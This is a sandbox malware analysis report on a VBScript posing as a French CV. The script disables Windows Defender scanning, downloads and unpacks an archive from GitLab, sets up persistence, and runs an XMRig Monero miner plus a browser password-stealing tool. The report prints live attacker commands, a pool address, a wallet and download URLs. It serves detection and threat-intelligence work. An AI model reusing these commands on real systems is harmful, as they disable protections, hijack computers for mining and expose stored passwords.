Edit tour

Windows Analysis Report
curriculum_vitae-copie.vbs

Overview

General Information

Sample name:	curriculum_vitae-copie.vbs
Analysis ID:	1369672
MD5:	7eb1457ada651aea9840c8017d502c96
SHA1:	9d3dabcd49b3d44389787ad0cdd2309a683bbb58
SHA256:	088d248eeef4cbdda4fc766c4daf16173d66e05c32b3a1802d18a6e4dc208850
Tags:	vbs
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Register Wscript In Run Key

Sigma detected: Xmrig

System process connects to network (likely due to code injection or exploit)

VBScript performs obfuscated calls to suspicious functions

Yara detected Xmrig cryptocurrency miner

Adds a directory exclusion to Windows Defender

Deletes itself after installation

Drops PE files to the user root directory

Found strings related to Crypto-Mining

Machine Learning detection for dropped file

Potential evasive VBS script found (sleep loop)

Potential malicious VBS script found (has network functionality)

Potential malicious VBS script found (suspicious strings)

Query firmware table information (likely to detect VMs)

Sample is not signed and drops a device driver

Suspicious execution chain found

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript called in batch mode (surpress errors)

Wscript starts Powershell (via cmd or directly)

Yara detected WebBrowserPassView password recovery tool

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Enables security privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 6264 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\curriculum_vitae-copie.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

wscript.exe (PID: 6888 cmdline: C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\curriculum_vitae-copie.vbs MD5: A47CBE969EA935BDD3AB568BB126BC80)

cmd.exe (PID: 5996 cmdline: C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l: MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2020 cmdline: powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:" MD5: 04029E121A0CFA5991749937DD22A1D9)

WmiPrvSE.exe (PID: 2264 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

7g.exe (PID: 1968 cmdline: C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7z MD5: 58FC6DE6C4E5D2FDA63565D54FEB9E75)

conhost.exe (PID: 528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5752 cmdline: C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6336 cmdline: schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

wscript.exe (PID: 1540 cmdline: "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo MD5: A47CBE969EA935BDD3AB568BB126BC80)

taskkill.exe (PID: 6920 cmdline: "C:\Windows\System32\taskkill.exe" /f /im chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wscript.exe (PID: 3496 cmdline: wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo MD5: A47CBE969EA935BDD3AB568BB126BC80)

mservice.exe (PID: 3220 cmdline: "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 46h9kZidsk2VUmQNv72SLMMrizTnSJTYtHJRFXeBrZcDJjVHTn83T5teYjUggDNLbTYdwgsgHQC2N3LzoNQdqppN6SYmjYr -p 0401-08h49m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title MD5: CFC0000B993A31C11EF58AC53837E4E1)

conhost.exe (PID: 3384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wscript.exe (PID: 5396 cmdline: "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo MD5: A47CBE969EA935BDD3AB568BB126BC80)

wscript.exe (PID: 3392 cmdline: "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo MD5: A47CBE969EA935BDD3AB568BB126BC80)

wscript.exe (PID: 1540 cmdline: wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo MD5: A47CBE969EA935BDD3AB568BB126BC80)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\Public\WindowsUpdate\ps.exe	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
C:\Users\Public\WindowsUpdate\mservice.exe	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Users\Public\WindowsUpdate\mservice.exe	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x427ab8:$x1: donate.ssl.xmrig.com 0x427fb1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
C:\Users\Public\WindowsUpdate\mservice.exe	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4285b0:$s1: %s/%s (Windows NT %lu.%lu 0x429660:$s3: \\.\WinRing0_ 0x423430:$s4: pool_wallet 0x41f288:$s5: cryptonight 0x41f298:$s5: cryptonight 0x41f2a8:$s5: cryptonight 0x41f2b8:$s5: cryptonight 0x41f2d0:$s5: cryptonight 0x41f2e0:$s5: cryptonight 0x41f2f0:$s5: cryptonight 0x41f308:$s5: cryptonight 0x41f318:$s5: cryptonight 0x41f330:$s5: cryptonight 0x41f348:$s5: cryptonight 0x41f358:$s5: cryptonight 0x41f368:$s5: cryptonight 0x41f378:$s5: cryptonight 0x41f390:$s5: cryptonight 0x41f3a8:$s5: cryptonight 0x41f3b8:$s5: cryptonight 0x41f3c8:$s5: cryptonight

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000003.2420735515.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000015.00000000.2492318831.00007FF7BD782000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x427ab8:$x1: donate.ssl.xmrig.com 0x427fb1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4285b0:$s1: %s/%s (Windows NT %lu.%lu 0x429660:$s3: \\.\WinRing0_ 0x423430:$s4: pool_wallet 0x41f288:$s5: cryptonight 0x41f298:$s5: cryptonight 0x41f2a8:$s5: cryptonight 0x41f2b8:$s5: cryptonight 0x41f2d0:$s5: cryptonight 0x41f2e0:$s5: cryptonight 0x41f2f0:$s5: cryptonight 0x41f308:$s5: cryptonight 0x41f318:$s5: cryptonight 0x41f330:$s5: cryptonight 0x41f348:$s5: cryptonight 0x41f358:$s5: cryptonight 0x41f368:$s5: cryptonight 0x41f378:$s5: cryptonight 0x41f390:$s5: cryptonight 0x41f3a8:$s5: cryptonight 0x41f3b8:$s5: cryptonight 0x41f3c8:$s5: cryptonight
Process Memory Space: 7g.exe PID: 1968	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: 7g.exe PID: 1968	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: mservice.exe PID: 3220	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.3.7g.exe.32a7600.3.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
11.3.7g.exe.32a7600.3.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
11.3.7g.exe.32a7600.3.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
11.3.7g.exe.32a7600.3.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x3f04b8:$x1: donate.ssl.xmrig.com 0x3f09b1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
11.3.7g.exe.32a7600.3.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x3f0fb0:$s1: %s/%s (Windows NT %lu.%lu 0x3f2060:$s3: \\.\WinRing0_ 0x3ebe30:$s4: pool_wallet 0x3e7c88:$s5: cryptonight 0x3e7c98:$s5: cryptonight 0x3e7ca8:$s5: cryptonight 0x3e7cb8:$s5: cryptonight 0x3e7cd0:$s5: cryptonight 0x3e7ce0:$s5: cryptonight 0x3e7cf0:$s5: cryptonight 0x3e7d08:$s5: cryptonight 0x3e7d18:$s5: cryptonight 0x3e7d30:$s5: cryptonight 0x3e7d48:$s5: cryptonight 0x3e7d58:$s5: cryptonight 0x3e7d68:$s5: cryptonight 0x3e7d78:$s5: cryptonight 0x3e7d90:$s5: cryptonight 0x3e7da8:$s5: cryptonight 0x3e7db8:$s5: cryptonight 0x3e7dc8:$s5: cryptonight
11.3.7g.exe.3270000.1.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
11.3.7g.exe.3270000.1.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
11.3.7g.exe.3270000.1.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x427ab8:$x1: donate.ssl.xmrig.com 0x427fb1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
11.3.7g.exe.3270000.1.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4285b0:$s1: %s/%s (Windows NT %lu.%lu 0x429660:$s3: \\.\WinRing0_ 0x423430:$s4: pool_wallet 0x41f288:$s5: cryptonight 0x41f298:$s5: cryptonight 0x41f2a8:$s5: cryptonight 0x41f2b8:$s5: cryptonight 0x41f2d0:$s5: cryptonight 0x41f2e0:$s5: cryptonight 0x41f2f0:$s5: cryptonight 0x41f308:$s5: cryptonight 0x41f318:$s5: cryptonight 0x41f330:$s5: cryptonight 0x41f348:$s5: cryptonight 0x41f358:$s5: cryptonight 0x41f368:$s5: cryptonight 0x41f378:$s5: cryptonight 0x41f390:$s5: cryptonight 0x41f3a8:$s5: cryptonight 0x41f3b8:$s5: cryptonight 0x41f3c8:$s5: cryptonight
21.0.mservice.exe.7ff7bd440000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
21.0.mservice.exe.7ff7bd440000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x427ab8:$x1: donate.ssl.xmrig.com 0x427fb1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
21.0.mservice.exe.7ff7bd440000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4285b0:$s1: %s/%s (Windows NT %lu.%lu 0x429660:$s3: \\.\WinRing0_ 0x423430:$s4: pool_wallet 0x41f288:$s5: cryptonight 0x41f298:$s5: cryptonight 0x41f2a8:$s5: cryptonight 0x41f2b8:$s5: cryptonight 0x41f2d0:$s5: cryptonight 0x41f2e0:$s5: cryptonight 0x41f2f0:$s5: cryptonight 0x41f308:$s5: cryptonight 0x41f318:$s5: cryptonight 0x41f330:$s5: cryptonight 0x41f348:$s5: cryptonight 0x41f358:$s5: cryptonight 0x41f368:$s5: cryptonight 0x41f378:$s5: cryptonight 0x41f390:$s5: cryptonight 0x41f3a8:$s5: cryptonight 0x41f3b8:$s5: cryptonight 0x41f3c8:$s5: cryptonight
Click to see the 7 entries

Sigma Signatures

Bitcoin Miner

Sigma detected: Xmrig

Source: Process started

Author: Joe Security: Data: Command: "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 46h9kZidsk2VUmQNv72SLMMrizTnSJTYtHJRFXeBrZcDJjVHTn83T5teYjUggDNLbTYdwgsgHQC2N3LzoNQdqppN6SYmjYr -p 0401-08h49m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title, CommandLine: "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 46h9kZidsk2VUmQNv72SLMMrizTnSJTYtHJRFXeBrZcDJjVHTn83T5teYjUggDNLbTYdwgsgHQC2N3LzoNQdqppN6SYmjYr -p 0401-08h49m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title, CommandLine|base64offset|contains: , Image: C:\Users\Public\WindowsUpdate\mservice.exe, NewProcessName: C:\Users\Public\WindowsUpdate\mservice.exe, OriginalFileName: C:\Users\Public\WindowsUpdate\mservice.exe, ParentCommandLine: wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo, ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3496, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 46h9kZidsk2VUmQNv72SLMMrizTnSJTYtHJRFXeBrZcDJjVHTn83T5teYjUggDNLbTYdwgsgHQC2N3LzoNQdqppN6SYmjYr -p 0401-08h49m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title, ProcessId: 3220, ProcessName: mservice.exe

Persistence and Installation Behavior

Sigma detected: Register Wscript In Run Key

Source: Registry Key set

Author: Joe Security: Data: Details: wscript.exe "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 6888, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Media Service

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: curriculum_vitae-copie.vbs

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\Public\WindowsUpdate\mservice.exe

Avira: detection malicious, Label: HEUR/AGEN.1311290

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\WindowsUpdate\go.exe	ReversingLabs: Detection: 27%
Source: C:\Users\Public\WindowsUpdate\go.exe	Virustotal: Detection: 27%	Perma Link
Source: C:\Users\Public\WindowsUpdate\mservice.exe	ReversingLabs: Detection: 55%
Source: C:\Users\Public\WindowsUpdate\mservice.exe	Virustotal: Detection: 72%	Perma Link
Source: C:\Users\Public\WindowsUpdate\ps.exe	ReversingLabs: Detection: 80%
Source: C:\Users\Public\WindowsUpdate\ps.exe	Virustotal: Detection: 76%	Perma Link

Multi AV Scanner detection for submitted file

Source: curriculum_vitae-copie.vbs

Virustotal: Detection: 17%

Perma Link

Machine Learning detection for dropped file

Source: C:\Users\Public\WindowsUpdate\mservice.exe

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: 11.3.7g.exe.32a7600.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.7g.exe.3270000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.mservice.exe.7ff7bd440000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000000.2492318831.00007FF7BD782000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7g.exe PID: 1968, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mservice.exe PID: 3220, type: MEMORYSTR
Source: Yara match	File source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED

Found strings related to Crypto-Mining

Source: 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: cryptonight/0
Source: 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: -o, --url=URL URL of mining server

Source: unknown	HTTPS traffic detected: 49.12.202.237:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.6:49707 version: TLS 1.2

Source:	Binary string: .pdbo` source: 7g.exe, 0000000B.00000003.2420735515.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, go.exe.11.dr
Source:	Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: 7g.exe, 0000000B.00000003.2420735515.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.dr

Source: C:\Users\Public\7g.exe

Code function: 11_2_009D65A1 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,

11_2_009D65A1

Source: C:\Users\Public\7g.exe

Code function: 11_2_009D71B5 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,

11_2_009D71B5

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Adobe\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 49.12.202.237 443			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 172.65.251.78 443			Jump to behavior

Potential malicious VBS script found (has network functionality)

Source:	Initial file: .write L5E2PXPpeL5.responseBody
Source:	Initial file: .savetofile L5f0VmZOqPPL5, 2
Source: C:\Users\Public\7g.exe	Dropped file: .write L5xL5.responseBody	Jump to dropped file
Source: C:\Users\Public\7g.exe	Dropped file: .savetofile L5sL5, 2 '//overwrite	Jump to dropped file

Source: Joe Sandbox View	IP Address: 172.65.251.78 172.65.251.78
Source: Joe Sandbox View	IP Address: 49.12.202.237 49.12.202.237

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /a/7zr.exe HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.7-zip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cv4500942/cv/-/raw/main/gmail.7z?inline=false HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gitlab.comConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /a/7zr.exe HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.7-zip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cv4500942/cv/-/raw/main/gmail.7z?inline=false HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gitlab.comConnection: Keep-Alive

Source: 7g.exe, 0000000B.00000003.2420735515.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr	String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: 7g.exe, 0000000B.00000003.2420735515.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr	String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: www.7-zip.org

Source: 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.dr	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: wscript.exe, 00000004.00000003.2458037507.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460502761.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461110939.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461282573.000001ADB85CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462864277.000001ADB85CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://microsoft.co
Source: 7g.exe, 0000000B.00000003.2420735515.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr	String found in binary or memory: http://www.nirsoft.net/
